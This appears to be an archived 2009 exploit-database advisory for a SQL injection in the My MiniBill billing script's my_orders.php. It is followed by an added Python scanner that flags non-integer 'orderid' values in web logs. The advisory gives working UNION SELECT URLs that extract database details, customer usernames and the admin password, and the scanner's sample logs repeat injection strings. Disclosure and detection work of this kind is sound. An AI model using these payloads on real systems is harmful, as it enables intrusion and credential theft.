My Mini Bill - 'orderid' SQL Injection

EDB-ID: 8864
Platform: PHP
Date: 2009-06-03



My MiniBill (my_orders.php) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor: http://cupidsystems.com
------
More info: http://cupidsystems.com/products/myminibill/index.php
--------
Note: You must first register on the site at [path]/register.php
Then go to the exploit URL:
------------------
http://victim/[path]/my_orders.php?action=status&orderid=-68+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9--
Login Information:
-----------------
For:
username: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,username,5,6,7,8,9+from+dbminibill.tblorders+limit+0,1
Password: http://site/my_orders.php?action=status&orderid=-68+union+select+1,2,3,adminpassword,5,6,7,8,9+from+tblgeneral
Demo:
http://cupidsystems.com/products/myminibill/demo/
Note: Algeria in the World Cup, In shaa Allah*
################################################################################################

# milw0rm.com [2009-06-03]
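
A defender-side check for the issue described above, as an added example that is not part of the original advisory: it scans web access logs for requests to my_orders.php whose orderid value is not a plain integer. The log lines, paths and addresses are constructed, and the rule that legitimate order ids are unsigned integers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; hosts, paths and IPs are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Jun/2009:10:00:01 +0000] "GET /shop/my_orders.php?action=status&orderid=68 HTTP/1.1" 200 512
192.0.2.44 - - [03/Jun/2009:10:02:13 +0000] "GET /shop/my_orders.php?action=status&orderid=-68+union+select+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 734
192.0.2.44 - - [03/Jun/2009:10:02:40 +0000] "GET /shop/my_orders.php?action=status&orderid=%2D68%20UNION%20SELECT%201 HTTP/1.1" 200 701
192.0.2.10 - - [03/Jun/2009:10:05:00 +0000] "GET /shop/register.php HTTP/1.1" 200 300
192.0.2.77 - - [03/Jun/2009:10:06:00 +0000] "GET /shop/my_orders.php?action=status&orderid=12&orderid=1+or+1=1 HTTP/1.1" 200 400
"""

# client ip, timestamp and request target from a common/combined log line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Assumption: a legitimate orderid is a short unsigned integer.
VALID_ORDERID = re.compile(r'\A[0-9]{1,10}\Z')

def suspicious_orderid_requests(log_text):
    """Return (client_ip, timestamp, decoded_orderid) for every request to
    my_orders.php that carries an orderid which is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/my_orders.php"):
            continue
        # parse_qs URL-decodes values ('+' and %20 become spaces) and keeps
        # repeated parameters, so encoded or duplicated values are checked too.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("orderid", []):
            if not VALID_ORDERID.match(value):
                hits.append((ip, ts, value))
    return hits

if __name__ == "__main__":
    for ip, ts, value in suspicious_orderid_requests(SAMPLE_LOG):
        print(f"{ts} {ip} non-numeric orderid: {value!r}")
```

An allow-list on the parameter's expected shape catches encoded and mixed-case variants that keyword matching would miss; the same integer check belongs in my_orders.php itself, ahead of a parameterized query.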